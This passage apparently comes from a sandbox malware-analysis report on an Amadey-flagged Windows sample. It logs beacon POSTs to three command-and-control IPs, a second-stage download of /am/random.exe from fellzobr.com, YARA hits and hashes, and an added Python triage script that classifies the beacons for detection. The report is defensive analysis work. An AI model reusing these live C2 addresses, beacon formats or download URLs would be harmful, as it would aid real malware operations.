                  Jul 10, 2024 17:36:13.149159908 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.149336100 CEST804972989.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:13.149384022 CEST4972980192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.154664040 CEST804973489.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:14.068423986 CEST804973489.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:14.068624020 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:14.281595945 CEST8049733185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.283543110 CEST4973380192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.392549992 CEST4973380192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.393966913 CEST4973580192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.398442984 CEST8049733185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.398818970 CEST8049735185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.398921013 CEST4973580192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.399072886 CEST4973580192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.403877020 CEST8049735185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.823916912 CEST4973580192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.823971033 CEST4973180192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:14.934020996 CEST4973680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.934170961 CEST4973780192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:14.939307928 CEST8049736185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.939322948 CEST8049737185.208.158.116192.168.2.6
                  Jul 10, 2024 17:36:14.939379930 CEST4973680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.939397097 CEST4973780192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:14.939579010 CEST4973680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.939673901 CEST4973780192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:14.944345951 CEST8049736185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.944493055 CEST8049737185.208.158.116192.168.2.6
                  Jul 10, 2024 17:36:15.240952969 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:15.241389990 CEST4973680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:15.241446018 CEST4973780192.168.2.6185.208.158.116
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 10, 2024 17:36:11.628673077 CEST | 55549 | 53 | 192.168.2.6 | 1.1.1.1
                  Jul 10, 2024 17:36:11.645061016 CEST | 53 | 55549 | 1.1.1.1 | 192.168.2.6
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jul 10, 2024 17:36:11.628673077 CEST | 192.168.2.6 | 1.1.1.1 | 0xfc98 | Standard query (0) | fellzobr.com | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jul 10, 2024 17:36:11.645061016 CEST | 1.1.1.1 | 192.168.2.6 | 0xfc98 | No error (0) | fellzobr.com | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                  Jul 10, 2024 17:36:11.645061016 CEST | 1.1.1.1 | 192.168.2.6 | 0xfc98 | No error (0) | fellzobr.com | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                  • fellzobr.com
                  • 185.208.158.116
                  • 89.23.103.42
                  • 185.209.162.226
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.6 | 49725 | 185.208.158.116 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:06.824712038 CEST | 159 | OUT | POST /hb9IvshS01/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.208.158.116
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.6 | 49724 | 89.23.103.42 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:06.824728012 CEST | 156 | OUT | POST /hb9IvshS02/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 89.23.103.42
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.6 | 49726 | 185.209.162.226 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:06.824901104 CEST | 159 | OUT | POST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.6 | 49727 | 185.209.162.226 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:08.430263042 CEST | 317 | OUT | POST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  4 | 192.168.2.6 | 49728 | 185.209.162.226 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:10.172163010 CEST | 159 | OUT | POST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  5 | 192.168.2.6 | 49729 | 89.23.103.42 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:10.830326080 CEST | 314 | OUT | POST /hb9IvshS02/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 89.23.103.42
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
                  Jul 10, 2024 17:36:11.618807077 CEST | 279 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.14.0 (Ubuntu)
                  Date: Wed, 10 Jul 2024 15:36:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 35 39 0d 0a 20 3c 63 3e 31 30 30 30 30 30 34 30 38 31 2b 2b 2b 38 62 35 39 37 63 31 32 30 36 31 31 35 35 39 66 34 64 36 64 63 63 62 31 66 32 34 65 66 38 64 31 32 62 30 37 32 30 64 35 65 30 38 32 61 35 35 38 61 34 65 62 34 66 65 65 64 62 66 66 30 37 63 31 35 33 63 66 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 59 <c>1000004081+++8b597c120611559f4d6dccb1f24ef8d12b0720d5e082a558a4eb4feedbff07c153cf#<d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.6 | 49730 | 185.209.162.226 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:10.832125902 CEST | 317 | OUT | POST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  7 | 192.168.2.6 | 49731 | 185.208.158.116 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:10.832449913 CEST | 317 | OUT | POST /hb9IvshS01/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.208.158.116
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  8 | 192.168.2.6 | 49733 | 185.209.162.226 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:12.682913065 CEST | 159 | OUT | POST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  9 | 192.168.2.6 | 49734 | 89.23.103.42 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:13.149159908 CEST | 184 | OUT | POST /hb9IvshS02/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 89.23.103.42
                  Content-Length: 31
                  Cache-Control: no-cache
                  Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 38 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                  Data Ascii: d1=1000004081&unit=246122658369
                  Jul 10, 2024 17:36:14.068423986 CEST | 193 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.14.0 (Ubuntu)
                  Date: Wed, 10 Jul 2024 15:36:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 4 <c>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  10 | 192.168.2.6 | 49735 | 185.209.162.226 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:14.399072886 CEST | 317 | OUT | POST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  11 | 192.168.2.6 | 49736 | 185.209.162.226 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:14.939579010 CEST | 159 | OUT | POST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  12 | 192.168.2.6 | 49737 | 185.208.158.116 | 80 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 10, 2024 17:36:14.939673901 CEST | 159 | OUT | POST /hb9IvshS01/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.208.158.116
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


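Added example (not part of the Joe Sandbox report and not Amadey's own code): a small Python triage script for the HTTP sessions listed above. It dechunks the C2 reply, classifies the three request shapes that occur in the capture (`st=s`, `r=<hex>`, `d1=<id>&unit=<n>`), and checks that the task id the C2 handed out in its `<c>...<d>` reply (session 5) is the id the bot sends back in the `d1=` request (session 9). The sample beacons and both responses are copied from the sessions above, with the long `r=` hex shortened; the names given to the three request types (status poll, registration, task report) are this example's working assumptions, not something the report states.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed from the HTTP sessions in the report: (source port, C2 host, path, request body).
# The 158-character hex "r=" body is shortened; only its shape matters for classification.
BEACONS: List[Tuple[int, str, str, str]] = [
    (49725, "185.208.158.116", "/hb9IvshS01/index.php", "st=s"),
    (49724, "89.23.103.42",    "/hb9IvshS02/index.php", "st=s"),
    (49726, "185.209.162.226", "/hb9IvshS03/index.php", "st=s"),
    (49729, "89.23.103.42",    "/hb9IvshS02/index.php",
     "r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB"),
    (49734, "89.23.103.42",    "/hb9IvshS02/index.php", "d1=1000004081&unit=246122658369"),
]

# Raw chunked response bodies as captured: session 5 carried a task, session 9 an empty <c>.
TASK_RESPONSE_RAW = (
    "59\r\n <c>1000004081+++"
    "8b597c120611559f4d6dccb1f24ef8d12b0720d5e082a558a4eb4feedbff07c153cf#<d>\r\n"
    "0\r\n\r\n"
)
EMPTY_RESPONSE_RAW = "4\r\n <c>\r\n0\r\n\r\n"

# Request shapes seen in the capture: "/<token>/index.php" plus one of three body forms.
C2_PATH = re.compile(r"^/[A-Za-z0-9]{8,}/index\.php$")
BODY_PATTERNS = {
    "status_poll":  re.compile(r"^st=s$"),
    "registration": re.compile(r"^r=[0-9A-F]{32,}$"),
    "task_report":  re.compile(r"^d1=(?P<task>\d+)&unit=(?P<unit>\d+)$"),
}
# "<c>" + task id + "+++" + opaque hex reference + "#<d>"; the reference's meaning is not asserted.
TASK_RE = re.compile(r"<c>(?P<task>\d+)\+\+\+(?P<ref>[0-9a-f]+)#<d>")


def dechunk(raw: str) -> str:
    """Join the chunks of a Transfer-Encoding: chunked body; stops at the zero-length chunk."""
    out, pos = [], 0
    while True:
        end = raw.index("\r\n", pos)
        size = int(raw[pos:end].split(";")[0], 16)   # ignore chunk extensions after ';'
        if size == 0:
            return "".join(out)
        out.append(raw[end + 2:end + 2 + size])
        pos = end + 2 + size + 2                      # skip the data and its trailing CRLF


def classify_beacon(path: str, body: str) -> Optional[Dict[str, str]]:
    """Return the beacon kind (and any captured fields) if the request matches a known C2 shape."""
    if not C2_PATH.match(path):
        return None
    for kind, pattern in BODY_PATTERNS.items():
        m = pattern.match(body)
        if m:
            return {"kind": kind, **m.groupdict()}
    return None


def parse_tasks(raw_chunked_response: str) -> List[Tuple[str, str]]:
    """Extract (task id, reference) pairs from a dechunked <c>...<d> task reply."""
    body = dechunk(raw_chunked_response)
    return [(m.group("task"), m.group("ref")) for m in TASK_RE.finditer(body)]


def triage(beacons=BEACONS, task_response=TASK_RESPONSE_RAW) -> Dict[str, object]:
    """Summarise C2 hosts and paths, count beacon kinds, and match issued tasks to acknowledgements."""
    hosts, paths, kinds, reported = set(), set(), {}, set()
    for _port, host, path, body in beacons:
        hit = classify_beacon(path, body)
        if hit is None:
            continue
        hosts.add(host)
        paths.add(path)
        kinds[hit["kind"]] = kinds.get(hit["kind"], 0) + 1
        if hit["kind"] == "task_report":
            reported.add(hit["task"])
    issued = {task for task, _ref in parse_tasks(task_response)}
    return {
        "c2_hosts": sorted(hosts),
        "c2_paths": sorted(paths),
        "beacons": kinds,
        "tasks_issued": sorted(issued),
        "tasks_acknowledged": sorted(issued & reported),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

The path and body patterns are deliberately tight to this capture; for a network detection the path shape would be combined with the other feature visible in every request above, a `POST` carrying only `Content-Type`, `Host`, `Content-Length` and `Cache-Control` and no `User-Agent`.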
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.6 | 49732 | 188.114.96.3 | 443 | 6912 | C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-07-10 15:36:12 UTC | 51 | OUT | GET /am/random.exe HTTP/1.1
                  Host: fellzobr.com
                  2024-07-10 15:36:12 UTC | 688 | IN | HTTP/1.1 200 OK
                  Date: Wed, 10 Jul 2024 15:36:12 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 439808
                  Connection: close
                  Last-Modified: Wed, 10 Jul 2024 15:12:18 GMT
                  ETag: "668ea4d2-6b600"
                  Cache-Control: max-age=14400
                  CF-Cache-Status: HIT
                  Age: 271
                  Accept-Ranges: bytes
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqZeDXRzs7cBo6oe1LxphNst9vuFwLSDgcdBehJgoYGgyMRZvm4488qzgwxgEnAnRQizo9U1tRta3zS1YFi4m8dAkyWvANpm5OPTWWMDzLraQY8Wi5Scw3MTdNTA0us%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a11a0c6da8a42e5-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-10 15:36:12 UTC | 681 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a1 bb b8 fb e5 da d6 a8 e5 da d6 a8 e5 da d6 a8 8a ac 7d a8 fe da d6 a8 8a ac 48 a8 f6 da d6 a8 8a ac 7c a8 a2 da d6 a8 ec a2 45 a8 ee da d6 a8 e5 da d7 a8 83 da d6 a8 8a ac 79 a8 e4 da d6 a8 8a ac 4c a8 e4 da d6 a8 8a ac 4b a8 e4 da d6 a8 52 69 63 68 e5 da d6 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1b ef a0 65 00 00 00 00 00 00 00 00 e0 00 03
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}H|EyLKRichPELe

                  Target ID:0
                  Start time:11:34:57
                  Start date:10/07/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x400000
                  File size:439'808 bytes
                  MD5 hash:233EA23B1C1587F1CF895F08BA6DA10B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.2134722904.0000000004530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:4
                  Start time:11:34:59
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 728
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:11:35:00
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 780
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:11:35:01
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 856
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:11:35:02
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 864
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:11:35:02
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:14
                  Start time:11:35:03
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:16
                  Start time:11:35:04
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1040
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:18
                  Start time:11:35:05
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1048
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:20
                  Start time:11:35:06
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1180
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:22
                  Start time:11:35:07
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1204
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:23
                  Start time:11:35:08
                  Start date:10/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
                  Imagebase:0x400000
                  File size:439'808 bytes
                  MD5 hash:233EA23B1C1587F1CF895F08BA6DA10B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
